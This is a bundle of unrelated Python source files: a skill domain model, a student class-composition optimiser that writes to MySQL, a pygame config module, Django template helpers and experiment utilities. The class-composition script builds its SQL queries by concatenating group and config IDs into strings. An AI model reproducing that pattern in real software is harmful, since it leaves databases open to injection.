'language_code': self.language_code,
'misconceptions_schema_version': self.misconceptions_schema_version,
'rubric_schema_version': self.rubric_schema_version,
'skill_contents_schema_version': self.skill_contents_schema_version,
'version': self.version,
'next_misconception_id': self.next_misconception_id,
'superseding_skill_id': self.superseding_skill_id,
'all_questions_merged': self.all_questions_merged
}
@classmethod
def create_default_skill(cls, skill_id, description, rubrics):
"""Returns a skill domain object with default values. This is for
the frontend where a default blank skill would be shown to the user
when the skill is created for the first time.
Args:
skill_id: str. The unique id of the skill.
description: str. The initial description for the skill.
rubrics: list(Rubric). The list of rubrics for the skill.
Returns:
Skill. The Skill domain object with the default values.
"""
explanation_content_id = feconf.DEFAULT_SKILL_EXPLANATION_CONTENT_ID
skill_contents = SkillContents(
state_domain.SubtitledHtml(
explanation_content_id, feconf.DEFAULT_SKILL_EXPLANATION), [],
state_domain.RecordedVoiceovers.from_dict({
'voiceovers_mapping': {
explanation_content_id: {}
}
}),
state_domain.WrittenTranslations.from_dict({
'translations_mapping': {
explanation_content_id: {}
}
}))
return cls(
skill_id, description, [], rubrics, skill_contents,
feconf.CURRENT_MISCONCEPTIONS_SCHEMA_VERSION,
feconf.CURRENT_RUBRIC_SCHEMA_VERSION,
feconf.CURRENT_SKILL_CONTENTS_SCHEMA_VERSION,
constants.DEFAULT_LANGUAGE_CODE, 0, 0, None, False)
@classmethod
def update_skill_contents_from_model(
cls, versioned_skill_contents, current_version):
"""Converts the skill_contents blob contained in the given
versioned_skill_contents dict from current_version to
current_version + 1. Note that the versioned_skill_contents being
passed in is modified in-place.
Args:
versioned_skill_contents: dict. A dict with two keys:
- schema_version: str. The schema version for the
skill_contents dict.
- skill_contents: dict. The dict comprising the skill
contents.
current_version: int. The current schema version of skill_contents.
"""
versioned_skill_contents['schema_version'] = current_version + 1
conversion_fn = getattr(
cls, '_convert_skill_contents_v%s_dict_to_v%s_dict' % (
current_version, current_version + 1))
versioned_skill_contents['skill_contents'] = conversion_fn(
versioned_skill_contents['skill_contents'])
@classmethod
def update_misconceptions_from_model(
cls, versioned_misconceptions, current_version):
"""Converts the misconceptions blob contained in the given
versioned_misconceptions dict from current_version to
current_version + 1. Note that the versioned_misconceptions being
passed in is modified in-place.
Args:
versioned_misconceptions: dict. A dict with two keys:
- schema_version: str. The schema version for the
misconceptions dict.
- misconceptions: list(dict). The list of dicts comprising the
misconceptions of the skill.
current_version: int. The current schema version of misconceptions.
"""
versioned_misconceptions['schema_version'] = current_version + 1
conversion_fn = getattr(
cls, '_convert_misconception_v%s_dict_to_v%s_dict' % (
current_version, current_version + 1))
updated_misconceptions = []
for misconception in versioned_misconceptions['misconceptions']:
updated_misconceptions.append(conversion_fn(misconception))
versioned_misconceptions['misconceptions'] = updated_misconceptions
@classmethod
def update_rubrics_from_model(cls, versioned_rubrics, current_version):
"""Converts the rubrics blob contained in the given
versioned_rubrics dict from current_version to
current_version + 1. Note that the versioned_rubrics being
passed in is modified in-place.
Args:
versioned_rubrics: dict. A dict with two keys:
- schema_version: str. The schema version for the
rubrics dict.
- rubrics: list(dict). The list of dicts comprising the
rubrics of the skill.
current_version: int. The current schema version of rubrics.
"""
versioned_rubrics['schema_version'] = current_version + 1
conversion_fn = getattr(
cls, '_convert_rubric_v%s_dict_to_v%s_dict' % (
current_version, current_version + 1))
updated_rubrics = []
for rubric in versioned_rubrics['rubrics']:
updated_rubrics.append(conversion_fn(rubric))
versioned_rubrics['rubrics'] = updated_rubrics
def update_description(self, description):
"""Updates the description of the skill.
Args:
description: str. The new description of the skill.
"""
self.description = description
def update_language_code(self, language_code):
"""Updates the language code of the skill.
Args:
language_code: str. The new language code of the skill.
"""
self.language_code = language_code
def update_superseding_skill_id(self, superseding_skill_id):
"""Updates the superseding skill ID of the skill.
Args:
superseding_skill_id: str. ID of the skill that supersedes this one.
"""
self.superseding_skill_id = superseding_skill_id
def record_that_all_questions_are_merged(self, all_questions_merged):
"""Updates the flag value which indicates if all questions are merged.
Args:
all_questions_merged: bool. Flag indicating if all questions are
merged to the superseding skill.
"""
self.all_questions_merged = all_questions_merged
def update_explanation(self, explanation):
"""Updates the explanation of the skill.
Args:
explanation: SubtitledHtml. The new explanation of the skill.
"""
self.skill_contents.explanation = (
state_domain.SubtitledHtml.from_dict(explanation))
def update_worked_examples(self, worked_examples):
"""Updates the worked examples list of the skill.
Args:
worked_examples: list(dict). The new worked examples of the skill.
"""
old_content_ids = [worked_example.content_id for worked_example in (
self.skill_contents.worked_examples)]
self.skill_contents.worked_examples = [
state_domain.SubtitledHtml.from_dict(worked_example)
for worked_example in worked_examples]
new_content_ids = [worked_example.content_id for worked_example in (
self.skill_contents.worked_examples)]
self._update_content_ids_in_assets(old_content_ids, new_content_ids)
def _update_content_ids_in_assets(self, old_ids_list, new_ids_list):
"""Adds or deletes content ids in recorded_voiceovers and
written_translations.
Args:
old_ids_list: list(str). A list of content ids present earlier
in worked_examples.
state.
new_ids_list: list(str). A list of content ids currently present
in worked_examples.
"""
content_ids_to_delete = set(old_ids_list) - set(new_ids_list)
content_ids_to_add = set(new_ids_list) - set(old_ids_list)
written_translations = self.skill_contents.written_translations
recorded_voiceovers = self.skill_contents.recorded_voiceovers
for content_id in content_ids_to_delete:
recorded_voiceovers.delete_content_id_for_voiceover(content_id)
written_translations.delete_content_id_for_translation(
content_id)
for content_id in content_ids_to_add:
recorded_voiceovers.add_content_id_for_voiceover(content_id)
written_translations.add_content_id_for_translation(content_id)
def _find_misconception_index(self, misconception_id):
"""Returns the index of the misconception with the given misconception
id, or None if it is not in the misconceptions list.
Args:
misconception_id: int. The id of the misconception.
Returns:
int or None. The index of the corresponding misconception, or None
if there is no such misconception.
"""
for ind, misconception in enumerate(self.misconceptions):
if misconception.id == misconception_id:
return ind
return None
def add_misconception(self, misconception_dict):
"""Adds a new misconception to the skill.
Args:
misconception_dict: dict. The misconception to be added.
"""
misconception = Misconception(
misconception_dict['id'],
misconception_dict['name'],
misconception_dict['notes'],
misconception_dict['feedback'])
self.misconceptions.append(misconception)
self.next_misconception_id = self.get_incremented_misconception_id(
misconception_dict['id'])
def update_rubric(self, difficulty, explanation):
"""Adds or updates the rubric of the given difficulty.
Args:
difficulty: str. The difficulty of the rubric.
explanation: str. The explanation for the rubric.
"""
for rubric in self.rubrics:
if rubric.difficulty == difficulty:
rubric.explanation = explanation
return
raise ValueError(
'There is no rubric for the given difficulty.')
def get_incremented_misconception_id(self, misconception_id):
"""Returns the incremented misconception id.
Args:
misconception_id: int. The id of the misconception to be
incremented.
Returns:
int. The incremented misconception id.
"""
return misconception_id + 1
def delete_misconception(self, misconception_id):
"""Removes a misconception with the given id.
Args:
misconception_id: int. The id of the misconception to be removed.
Raises:
ValueError: There is no misconception with the given id.
"""
index = self._find_misconception_index(misconception_id)
if index is None:
raise ValueError(
'There is no misconception with the given id.')
del self.misconceptions[index]
def update_misconception_name(self, misconception_id, name):
"""Updates the name of the misconception with the given id.
Args:
misconception_id: int. The id of the misconception to be edited.
name: str. The new name of the misconception.
Raises:
ValueError: There is no misconception with the given id.
"""
index = self._find_misconception_index(misconception_id)
if index is None:
raise ValueError(
'There is no misconception with the given id.')
self.misconceptions[index].name = name
def update_misconception_notes(self, misconception_id, notes):
"""Updates the notes of the misconception with the given id.
Args:
misconception_id: int. The id of the misconception to be edited.
notes: str. The new notes of the misconception.
Raises:
ValueError: There is no misconception with the given id.
"""
index = self._find_misconception_index(misconception_id)
if index is None:
raise ValueError(
'There is no misconception with the given id.')
self.misconceptions[index].notes = notes
def update_misconception_feedback(self, misconception_id, feedback):
"""Updates the feedback of the misconception with the given id.
Args:
misconception_id: int. The id of the misconception to be edited.
feedback: str. The html string that corresponds to the new feedback
of the misconception.
Raises:
ValueError: There is no misconception with the given id.
"""
index = self._find_misconception_index(misconception_id)
if index is None:
raise ValueError(
'There is no misconception with the given id.')
self.misconceptions[index].feedback = feedback
class SkillSummary(python_utils.OBJECT):
"""Domain object for Skill Summary."""
def __init__(
self, skill_id, description, language_code, version,
misconception_count, worked_examples_count, skill_model_created_on,
skill_model_last_updated):
"""Constructs a SkillSummary domain object.
Args:
skill_id: str. The unique id of the skill.
description: str. The short description of the skill.
language_code: str. The language code of the skill.
version: int. The version of the skill.
misconception_count: int. The number of misconceptions associated
with the skill.
worked_examples_count: int. The number of worked examples in the
skill.
skill_model_created_on: datetime.datetime. Date and time when
the skill model is created.
skill_model_last_updated: datetime.datetime. Date and time
when the skill model was last updated.
"""
self.id = skill_id
self.description = description
self.language_code = language_code
self.version = version
self.misconception_count = misconception_count
self.worked_examples_count = worked_examples_count
self.skill_model_created_on = skill_model_created_on
self.skill_model_last_updated = skill_model_last_updated
def validate(self):
"""Validates various properties of the Skill Summary object.
Raises:
ValidationError: One or more attributes of skill summary are
invalid.
"""
if not isinstance(self.description, python_utils.BASESTRING):
raise utils.ValidationError('Description should be a string.')
if self.description == '':
raise utils.ValidationError('Description field should not be empty')
if not isinstance(self.language_code, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected language code to be a string, received %s' %
self.language_code)
if not utils.is_valid_language_code(self.language_code):
raise utils.ValidationError(
'Invalid language code: %s' % self.language_code)
if not isinstance(self.misconception_count, int):
raise utils.ValidationError(
'Expected misconception_count to be an int, '
'received \'%s\'' % self.misconception_count)
if self.misconception_count < 0:
raise utils.ValidationError(
'Expected misconception_count to be non-negative, '
'received \'%s\'' % self.misconception_count)
if not isinstance(self.worked_examples_count, int):
raise utils.ValidationError(
'Expected worked_examples_count to be an int, '
'received \'%s\'' % self.worked_examples_count)
if self.worked_examples_count < 0:
raise utils.ValidationError(
'Expected worked_examples_count to be non-negative, '
'received \'%s\'' % self.worked_examples_count)
def to_dict(self):
"""Returns a dictionary representation of this domain object.
Returns:
dict. A dict representing this SkillSummary object.
"""
return {
'id': self.id,
'description': self.description,
'language_code': self.language_code,
'version': self.version,
'misconception_count': self.misconception_count,
'worked_examples_count': self.worked_examples_count,
'skill_model_created_on': utils.get_time_in_millisecs(
self.skill_model_created_on),
'skill_model_last_updated': utils.get_time_in_millisecs(
self.skill_model_last_updated)
}
class SkillRights(python_utils.OBJECT):
"""Domain object for skill rights."""
def __init__(self, skill_id, skill_is_private, creator_id):
"""Constructor for a skill rights domain object.
Args:
skill_id: str. The id of the skill.
skill_is_private: bool. Whether the skill is private.
creator_id: str. The id of the creator of this skill.
"""
self.id = skill_id
self.skill_is_private = skill_is_private
self.creator_id = creator_id
def to_dict(self):
"""Returns a dict suitable for use by the frontend.
Returns:
dict. A dict version of SkillRights suitable for use by the
frontend.
"""
return {
'skill_id': self.id,
'skill_is_private': self.skill_is_private,
'creator_id': self.creator_id
}
def is_creator(self, user_id):
"""Checks whether the given user is the creator of this skill.
Args:
user_id: str. Id of the user.
Returns:
bool. Whether the user is the creator of this skill.
"""
return bool(user_id == self.creator_id)
def is_private(self):
"""Returns whether the skill is private.
Returns:
bool. Whether the skill is private.
"""
return self.skill_is_private
class SkillRightsChange(change_domain.BaseChange):
"""Domain object for changes made to a skill rights object.
The allowed commands, together with the attributes:
- 'create_new'
- 'publish_skill'.
"""
ALLOWED_COMMANDS = [{
'name': CMD_CREATE_NEW,
'required_attribute_names': [],
'optional_attribute_names': []
}, {
'name': CMD_PUBLISH_SKILL,
'required_attribute_names': [],
'optional_attribute_names': []
}]
class UserSkillMastery(python_utils.OBJECT):
"""Domain object for a user's mastery of a particular skill."""
def __init__(self, user_id, skill_id, degree_of_mastery):
"""Constructs a SkillMastery domain object for a user.
Args:
user_id: str. The user id of the user.
skill_id: str. The id of the skill.
degree_of_mastery: float. The user's mastery of the
corresponding skill.
"""
self.user_id = user_id
self.skill_id = skill_id
self.degree_of_mastery = degree_of_mastery
def to_dict(self):
"""Returns a dictionary representation of this domain object.
Returns:
dict. A dict representing this SkillMastery object.
"""
return {
'user_id': self.user_id,
'skill_id': self.skill_id,
'degree_of_mastery': self.degree_of_mastery
}
@classmethod
def from_dict(cls, skill_mastery_dict):
"""Returns a UserSkillMastery domain object from the given dict.
Args:
skill_mastery_dict: dict. A dict mapping all the fields of
UserSkillMastery object.
Returns:
SkillMastery. The SkillMastery domain object.
"""
return cls(
skill_mastery_dict['user_id'],
skill_mastery_dict['skill_id'],
skill_mastery_dict['degree_of_mastery']
)
|
the-stack_0_6486 | import random
import math
import time
import mysql.connector
import copy
import json
from .components.DBConfig import DBConfig
from .components.Configuration import Configuration
from .components.StudentsManager import StudentsManager
from .components.ContainersManager import ContainersManager
class CC:
def __init__(self, process_id, group_id, config_id):
self.process_id = process_id
self.group_id = group_id
self.config_id = config_id
def run(self):
print("Running CC...")
if self.group_id == "" or self.config_id == "":
return "NoGroupOrConfigSelected"
self.students_manager = StudentsManager(self.group_id)
self.configuration = Configuration(self.config_id)
self.containers_manager = ContainersManager(
14, # TODO: Set dynamic num of containers based on db configuration
# math.ceil(self.students_manager.get_number_of_students() / self.configuration.max_students),
self.configuration,
self.students_manager
)
self.total_number_of_students = self.students_manager.get_number_of_students()
print("\n\nCURRENT NUMBER OF STUDENTS INTO CONTAINERS: " + str(self.containers_manager.get_number_of_total_students_into_containers()) + "\n\n")
if self.total_number_of_students == 0:
return "ZeroStudentsIntoGroup"
print("Loaded students from db with id " + self.students_manager.group_id + ":",
self.total_number_of_students)
print("Loaded config from db with id " + self.configuration.config_id + ":",
self.configuration.config_name)
if self.is_already_generated():
print('Class Composition already generated! Exiting...')
return "CCAlreadyGenerated"
print("Created " + str(self.containers_manager.get_number_of_containers()) + " empty classes")
print("Sex priority: " + self.configuration.sex_priority)
configured_sex_priority_array = self.students_manager.get_sex_prioritized_students_array(
self.configuration.sex_priority,
self.configuration.num_sex_priority
)
print("Checking sex-prioritized array...")
for student_group in configured_sex_priority_array:
print("Student group length: " + str(len(student_group)), end="")
num_males, num_females = 0, 0
for student in student_group:
if student.sesso == "m":
num_males += 1
if student.sesso == "f":
num_females += 1
print(" - M: " + str(num_males) + " - F: " + str(num_females))
print("Finished checking sex-prioritized array...")
if len(configured_sex_priority_array) > self.containers_manager.get_number_of_containers():
print('<---WARNING---> Sex prioritized groups are more than possible containers!')
print('ABORT!')
return "TooManySexPrioritizedPeople"
students_not_inserted = self.containers_manager.distribute_sex_prioritized_groups_randomly_into_containers(
configured_sex_priority_array
)
print("Remaining students into StudentsManager:", self.students_manager.get_number_of_remaining_students())
print("\n\nCURRENT NUMBER OF STUDENTS INTO CONTAINERS: " + str(self.containers_manager.get_number_of_total_students_into_containers()) + "\n\n")
if len(students_not_inserted) > 0:
print("Some students from prioritized group weren't inserted!")
for student in students_not_inserted:
print("Student with matricola " + student.matricola + " was not inserted!")
else:
print("No students need to be reinserted, this is a good sign! :))")
# self.containers_manager.show_containers_statistics()
self.containers_manager.print_all_containers_current_dimensions()
print("Pairing and getting remaining students, matching by desiderata when possible...")
remaining_desiderata_students_array = self.students_manager.get_remaining_desiderata_students_array()
print("Found " + str(len(remaining_desiderata_students_array)) + " paired students!")
students_not_inserted = self.containers_manager.distribute_couples_randomly_into_containers(remaining_desiderata_students_array)
print("\n\nCURRENT NUMBER OF STUDENTS INTO CONTAINERS: " + str(self.containers_manager.get_number_of_total_students_into_containers()) + "\n\n")
if len(students_not_inserted) > 0:
print("Some O-O desiderata couple weren't inserted!")
for couple in students_not_inserted:
for student in couple:
print("Student with matricola " + student.matricola + " was not inserted!")
print("In total there are " + str(len(remaining_desiderata_students_array)) + " paired students to be reinserted!")
else:
print("No students need to be reinserted, this is a good sign! :))")
print("Getting remaining students on the database...")
remaining_students_array = self.students_manager.get_remaining_students_array()
remaining_students_after_random_insert = self.containers_manager.distribute_remaining_students_randomly_into_containers(remaining_students_array)
print("After random fill of remaining students, there are " + str(len(remaining_students_after_random_insert)) + " students to fill, still!")
if len(remaining_students_after_random_insert) == 0:
print("Well done, there is no students to swap of classroom, there!")
else:
print("We need to fill these " + str(len(remaining_students_after_random_insert)) + " students somewhere!")
if not self.containers_manager.fill_remaining_students_shuffling_classcontainers(remaining_students_after_random_insert):
return "CannotShuffleStudents"
print("\n\nCURRENT NUMBER OF STUDENTS INTO CONTAINERS: " + str(self.containers_manager.get_number_of_total_students_into_containers()) + "\n\n")
minimum_balancing_status = self.containers_manager.rebalance_students_to_reach_minimum_number_of_students_per_container()
if minimum_balancing_status:
print("Now classes are minimum balanced!")
else:
print("Cannot balance by mininum amount!")
return "CannotBalanceClassesByMininumValue"
"""
print("BEFORE OPTIMIZATION:")
std_sum_before = 0
for container in self.containers_manager.containers:
print(f"ContainerID: {container.containerid} - Container AVG: {container.get_avg()} - Container STD: {container.get_std()}")
std_sum_before += container.get_avg()
print(f"AVG: [{self.containers_manager.get_avg()}] - STD: [{self.containers_manager.get_std()}]")
"""
self.optimize()
"""
print("AFTER OPTIMIZATION:")
std_sum_after = 0
for container in self.containers_manager.containers:
print(f"ContainerID: {container.containerid} - Container AVG: {container.get_avg()} - Container STD: {container.get_std()}")
std_sum_after += container.get_avg()
print(f"AVG: [{self.containers_manager.get_avg()}] - STD: [{self.containers_manager.get_std()}]")
print(f"RESULTS: {std_sum_before} - {std_sum_after}")"""
print("\n\nCURRENT NUMBER OF STUDENTS INTO CONTAINERS: " + str(self.containers_manager.get_number_of_total_students_into_containers()) + "\n\n")
uninserted_students_by_matricola = self.students_manager.get_uninserted_students(self.containers_manager)
if len(uninserted_students_by_matricola) > 0:
print("\nWe found " + str(len(uninserted_students_by_matricola)) + " students not loaded, inserted and/or elaborated!")
print("Is it a correct number (TotalStudents == StudentsIntoContainers + UninsertedStudents)? -->", self.total_number_of_students == self.containers_manager.get_number_of_total_students_into_containers() + len(uninserted_students_by_matricola))
for matricola in uninserted_students_by_matricola:
print("Hey! Student with matricola " + matricola + " not loaded, inserted and/or elaborated!")
print("Remaining students into StudentsManager:", self.students_manager.get_number_of_remaining_students())
return "StudentsNotInsertedAfterShuffling"
else:
print("All students were inserted and elaborated correctly, good work!")
print("Saving CC to database...")
self.save_students_to_db()
print("Done!")
return True
def optimize(self):
def get_two_random_containers():
while True:
first_container = random.choice(self.containers_manager.containers)
second_container = random.choice(self.containers_manager.containers)
if first_container is not second_container:
break
return first_container, second_container
def get_std_of_two_containers(first_container, second_container):
first_container_avg = first_container.get_avg()
second_container_avg = second_container.get_avg()
containers_avg = (first_container_avg + second_container_avg) / 2
return math.sqrt(
(
math.pow(first_container_avg - containers_avg, 2) +
math.pow(second_container_avg - containers_avg, 2)
) / 2)
def optimize_random_couple_of_containers_fixed_cycles(num_of_cycles):
first_container, second_container = get_two_random_containers()
previous_swap_std = get_std_of_two_containers(first_container, second_container)
effective_changes = 0
for _ in range(num_of_cycles):
first_container_student = first_container.get_random_student()
second_container_student = second_container.get_random_student()
first_container_student_copy = copy.deepcopy(first_container_student)
second_container_student_copy = copy.deepcopy(second_container_student)
if first_container_student.eligible_to_swap(self.configuration.sex_priority) \
and second_container_student.eligible_to_swap(self.configuration.sex_priority) \
and not first_container.has_desiderata(first_container_student) \
and not second_container.has_desiderata(second_container_student):
first_container.remove_student(first_container_student)
second_container.remove_student(second_container_student)
first_result = first_container.add_student(second_container_student)
second_result = second_container.add_student(first_container_student)
after_swap_std = get_std_of_two_containers(first_container, second_container)
if first_result == None and second_result == None:
if after_swap_std >= previous_swap_std:
first_container.remove_student(second_container_student)
second_container.remove_student(first_container_student)
first_result = first_container.add_student(first_container_student_copy)
second_result = second_container.add_student(second_container_student_copy)
else:
effective_changes += 1
else:
first_container.remove_student(second_container_student)
second_container.remove_student(first_container_student)
first_result = first_container.add_student(first_container_student_copy)
second_result = second_container.add_student(second_container_student_copy)
return effective_changes
print("Optimizing...")
num_of_optimizations = self.total_number_of_students
num_of_effective_optimizations = 0
for i in range(0, num_of_optimizations):
num_of_effective_optimizations += optimize_random_couple_of_containers_fixed_cycles(25)
if i % 25 == 0:
print(str(round(i / num_of_optimizations * 100, 2)) + "%\t\t" + str(i) + "\toptcycle\toptsdone\t" + str(num_of_effective_optimizations) + "\tstudents\t" + str(self.containers_manager.get_number_of_total_students_into_containers()))
print("100%! Effective swaps done: " + str(num_of_effective_optimizations) + "\n")
def save_students_to_db(self):
connection = mysql.connector.connect(
user=DBConfig.user,
password=DBConfig.password,
host=DBConfig.host,
database=DBConfig.database)
cursor = connection.cursor()
for container in self.containers_manager.containers:
container_ids = container.get_students_id()
# print(f'Inserting container {container.containerid} with ids {container_ids}')
for student_id in container_ids:
query = "INSERT INTO classi_composte (`groupid`, `configid`, `studentid`, `classid`) VALUES (" + str(self.group_id) + ", " + str(self.config_id) + ", " + str(student_id) + ", " + str(container.containerid) + ")"
cursor.execute(query)
connection.commit()
cursor.close()
connection.close()
def is_already_generated(self):
connection = mysql.connector.connect(
user=DBConfig.user,
password=DBConfig.password,
host=DBConfig.host,
database=DBConfig.database)
cursor = connection.cursor()
query = "SELECT COUNT(*) FROM classi_composte WHERE groupid = " + self.group_id + " AND configid = " + self.config_id
cursor.execute(query)
num_of_students_already_inserted = cursor.fetchall()[0][0]
cursor.close()
connection.close()
return num_of_students_already_inserted > 0
def create_cc_instance(process_id, group_id, config_id):
cc = CC(process_id, group_id, config_id)
result_value = cc.run()
if result_value == True:
good_status_json = {
"querystatus" : "good",
"message" : "Composizione Classi completata!"
}
return json.dumps(good_status_json)
elif result_value == "ZeroStudentsIntoGroup":
bad_status_json = {
"querystatus" : "bad",
"message" : "Gruppo vuoto, non e' possibile generare alcuna configurazione!"
}
return json.dumps(bad_status_json)
elif result_value == "CCAlreadyGenerated":
bad_status_json = {
"querystatus" : "bad",
"message" : "Composizione Classi già generata per questo gruppo e configurazione!"
}
return json.dumps(bad_status_json)
elif result_value == "NoGroupOrConfigSelected":
bad_status_json = {
"querystatus" : "bad",
"message" : "Nessun gruppo e/o configurazione selezionato/a!"
}
return json.dumps(bad_status_json)
elif result_value == "CannotShuffleStudents":
bad_status_json = {
"querystatus" : "bad",
"message" : "Impossibile distribuire gli studenti con questa configurazione!"
}
return json.dumps(bad_status_json)
elif result_value == "TooManySexPrioritizedPeople":
bad_status_json = {
"querystatus" : "bad",
"message" : "Troppi utenti con priorità di sesso per questa richiesta!"
}
return json.dumps(bad_status_json)
elif result_value == "StudentsNotInsertedAfterShuffling":
bad_status_json = {
"querystatus" : "bad",
"message" : "Inserimento degli studenti tramite shuffling non possibile!"
}
return json.dumps(bad_status_json)
elif result_value == "CannotBalanceClassesByMininumValue":
bad_status_json = {
"querystatus" : "bad",
"message" : "Non è possibile bilanciare classi con un numero minimo di studenti così alto!"
}
return json.dumps(bad_status_json)
else:
bad_status_json = {
"querystatus" : "bad",
"message" : "Errore nella Composizione Classi! Contattare l'amministratore."
}
return json.dumps(bad_status_json)
|
the-stack_0_6487 | import json
from enum import Enum
from json.decoder import JSONDecodeError
import pygame
from lib import constants
_filePath = constants.res_loc() + "config.json"
_values = {}
class EntryType(Enum):
# lambda for converting key values to strings
Key = (0, lambda value: pygame.key.name(value).capitalize())
Toggle = (1, str)
Scroll = (2, str)
def __init__(self, index, func):
self._value_ = index
self.func = func
class Entries(Enum):
"""
Enumeration of all possible settings with it's default value
"""
KeyLeft = ("Move left", pygame.K_a, EntryType.Key)
KeyRight = ("Move right", pygame.K_d, EntryType.Key)
KeySpace = ("Jump", pygame.K_SPACE, EntryType.Key)
ShowDebug = ("Debug mode", False, EntryType.Toggle)
MusicVolume = ("Music volume", 1.0, EntryType.Scroll)
SoundVolume = ("Sound volume", 1.0, EntryType.Scroll)
def __init__(self, desc, default, entryType):
self.desc = desc
self.default = default
self.entryType = entryType
def getCurrentValue(self):
return _values[self.name]
def setCurrentValue(self, value):
global _values
_values[self.name] = value
def __str__(self):
return self.entryType.func(self.getCurrentValue())
def init():
loadConfig()
def resetConfig():
global _values
_values.clear()
for entry in Entries:
_values[entry.name] = entry.default
def loadConfig():
global _values
try:
with open(_filePath, "r") as file:
_values = json.load(file)
resolveComplete()
except (FileNotFoundError, JSONDecodeError):
resetConfig()
saveConfig()
def saveConfig():
with open(_filePath, "w") as file:
json.dump(_values, file, indent=4)
def resolveComplete():
global _values
update = False
for entry in Entries:
if entry.name not in _values:
update = True
_values[entry.name] = entry.default
if update:
saveConfig()
|
the-stack_0_6489 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
from django.forms.widgets import flatatt
from django.template import Variable, VariableDoesNotExist
from django.template.base import FilterExpression, kwarg_re, TemplateSyntaxError
from .text import text_value
# RegEx for quoted string
QUOTED_STRING = re.compile(r'^["\'](?P<noquotes>.+)["\']$')
def handle_var(value, context):
"""
Handle template tag variable
"""
# Resolve FilterExpression and Variable immediately
if isinstance(value, FilterExpression) or isinstance(value, Variable):
return value.resolve(context)
# Return quoted strings unquoted
# http://djangosnippets.org/snippets/886
stringval = QUOTED_STRING.search(value)
if stringval:
return stringval.group('noquotes')
# Resolve variable or return string value
try:
return Variable(value).resolve(context)
except VariableDoesNotExist:
return value
def parse_token_contents(parser, token):
"""
Parse template tag contents
"""
bits = token.split_contents()
tag = bits.pop(0)
args = []
kwargs = {}
asvar = None
if len(bits) >= 2 and bits[-2] == 'as':
asvar = bits[-1]
bits = bits[:-2]
if len(bits):
for bit in bits:
match = kwarg_re.match(bit)
if not match:
raise TemplateSyntaxError(
'Malformed arguments to tag "{}"'.format(tag))
name, value = match.groups()
if name:
kwargs[name] = parser.compile_filter(value)
else:
args.append(parser.compile_filter(value))
return {
'tag': tag,
'args': args,
'kwargs': kwargs,
'asvar': asvar,
}
def split_css_classes(css_classes):
"""
Turn string into a list of CSS classes
"""
classes_list = text_value(css_classes).split(' ')
return [c for c in classes_list if c]
def add_css_class(css_classes, css_class, prepend=False):
"""
Add a CSS class to a string of CSS classes
"""
classes_list = split_css_classes(css_classes)
classes_to_add = [c for c in split_css_classes(css_class)
if c not in classes_list]
if prepend:
classes_list = classes_to_add + classes_list
else:
classes_list += classes_to_add
return ' '.join(classes_list)
def remove_css_class(css_classes, css_class):
"""
Remove a CSS class from a string of CSS classes
"""
remove = set(split_css_classes(css_class))
classes_list = [c for c in split_css_classes(css_classes)
if c not in remove]
return ' '.join(classes_list)
def render_link_tag(url, rel='stylesheet', media=None):
"""
Build a link tag
"""
attrs = {
'href': url,
'rel': rel,
}
if media:
attrs['media'] = media
return render_tag('link', attrs=attrs, close=False)
def render_tag(tag, attrs=None, content=None, close=True):
"""
Render a HTML tag
"""
builder = '<{tag}{attrs}>{content}'
if content or close:
builder += '</{tag}>'
return builder.format(
tag=tag,
attrs=flatatt(attrs) if attrs else '',
content=text_value(content),
)
|
the-stack_0_6491 | import wave
import sys
import struct
import time
import subprocess
# import inspect
import threading
import traceback
import shlex
import os
import string
import random
import datetime as dt
import numpy as np
import scipy as sp
import scipy.special
from contextlib import closing
from argparse import ArgumentParser
# for allowing the logging module to send emails through gmail
# import logging
import logging.handlers
try:
import simplejson as json
except ImportError:
import json
# class TlsSMTPHandler(logging.handlers.SMTPHandler):
# def emit(self, record):
# """
# Emit a record.
#
# Format the record and send it to the specified addressees.
# """
# try:
# import smtplib
# import string # for tls add this line
# try:
# from email.utils import formatdate
# except ImportError:
# formatdate = self.date_time
# port = self.mailport
# if not port:
# port = smtplib.SMTP_PORT
# smtp = smtplib.SMTP(self.mailhost, port)
# msg = self.format(record)
# msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n\r\n%s" % (
# self.fromaddr,
# string.join(self.toaddrs, ","),
# self.getSubject(record),
# formatdate(), msg)
# if self.username:
# smtp.ehlo() # for tls add this line
# smtp.starttls() # for tls add this line
# smtp.ehlo() # for tls add this line
# smtp.login(self.username, self.password)
# smtp.sendmail(self.fromaddr, self.toaddrs, msg)
# print Exception
# smtp.quit()
# except (KeyboardInterrupt, SystemExit):
# raise
# except:
# print("error failed to send")
# self.handleError(record)
class NumpyAwareJSONEncoder(json.JSONEncoder):
""" this json encoder converts numpy arrays to lists so that json can write them.
example usage:
>>> import numpy as np
>>> dict_to_save = {'array': np.zeros((5,))}
>>> json.dumps(dict_to_save,
cls=NumpyAwareJSONEncoder
)
'{"array": [0.0, 0.0, 0.0, 0.0, 0.0]}'
"""
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
# consider importing this from python-neo
class Event(object):
"""docstring for Event"""
def __init__(self, event_time=None, duration=None, label='', name=None, description=None, file_origin=None, *args,
**kwargs):
super(Event, self).__init__()
self.time = event_time
self.duration = duration
self.label = label
self.name = name
self.description = description
self.file_origin = file_origin
self.annotations = {}
self.annotate(**kwargs)
def annotate(self, **kwargs):
self.annotations.update(kwargs)
class Stimulus(Event):
"""docstring for Stimulus"""
def __init__(self, *args, **kwargs):
super(Stimulus, self).__init__(*args, **kwargs)
if self.label == '':
self.label = 'stimulus'
class AuditoryStimulus(Stimulus):
"""docstring for AuditoryStimulus"""
def __init__(self, *args, **kwargs):
super(AuditoryStimulus, self).__init__(*args, **kwargs)
if self.label == '':
self.label = 'auditory_stimulus'
def run_state_machine(start_in='pre', error_state=None, error_callback=None, **state_functions):
"""runs a state machine defined by the keyword arguments
>>> def run_start():
>>> print "in 'run_start'"
>>> return 'next'
>>> def run_next():
>>> print "in 'run_next'"
>>> return None
>>> run_state_machine(start_in='start',
>>> start=run_start,
>>> next=run_next)
in 'run_start'
in 'run_next'
None
"""
# make sure the start state has a function to run
assert (start_in in state_functions.keys())
# make sure all of the arguments passed in are callable
for func in state_functions.values():
assert hasattr(func, '__call__')
state = start_in
while state is not None:
try:
state = state_functions[state]()
except Exception as e:
if error_callback:
error_callback(e)
raise
else:
raise
# state = error_state # 3/12/19 (AR) not sure what the point of this statement is
class Trial(Event):
"""docstring for Trial"""
def __init__(self,
index=None,
type_='normal',
class_=None,
*args, **kwargs):
